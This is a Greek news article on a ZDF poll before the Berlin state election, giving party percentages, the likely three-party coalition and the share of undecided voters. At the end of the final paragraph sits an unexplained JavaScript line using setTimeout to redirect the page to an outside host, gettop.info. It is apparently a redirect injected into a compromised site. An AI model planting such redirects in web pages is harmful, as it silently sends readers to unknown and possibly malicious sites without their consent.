Εκλογές στο Βερολίνο – Συνασπισμό τριών κομμάτων «βλέπουν» οι δημοσκοπήσεις

0
3

 

Εκλογές διεξάγονται την Κυριακή στο Βερολίνο και σύμφωνα με το Πολιτικό Βαρόμετρο του δεύτερου καναλιού της γερμανικής δημόσιας τηλεόρασης ZDF αναμένεται πως το πιθανότερο αποτέλεσμα θα είναι συνασπισμός τριών κομμάτων.

Σύμφωνα με τη δημοσκόπηση, CDU και SPD χάνουν από μία μονάδα σε σχέση με την προηγούμενη εβδομάδα, ενώ η Εναλλακτική για την Γερμανία (AfD) φαίνεται να φθάνει σε διψήφιο ποσοστό, με τους Φιλελεύθερους (FDP) να ετοιμάζονται να επιστρέψουν στην τοπική Βουλή.

Η SPD εξακολουθεί να προηγείται με 23%, ακολουθεί η CDU με 18%, οι Πράσινοι παραμένουν σταθεροί στο 15%, η Αριστερά (Die Linke) κερδίζει μισή μονάδα και φθάνει στο 14,5%, η AfD βρίσκεται σταθερά στο 14%, ενώ η FDP, με 1,5 μονάδα επιπλέον από την προηγούμενη εβδομάδα, φθάνει στο 6,5%. Εκτός Βουλής φαίνεται ότι θα παραμείνουν αυτή τη φορά οι Πειρατές. Μέχρι τώρα το Βερολίνο κυβερνά συνασπισμός CDU και SPD.

Σημαντικό εύρημα είναι πως το 59% των ψηφοφόρων έχουν αποφασίσει για το κόμμα που θα προτιμήσουν, ενώ το 41% παραμένουν αναποφάσιστο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here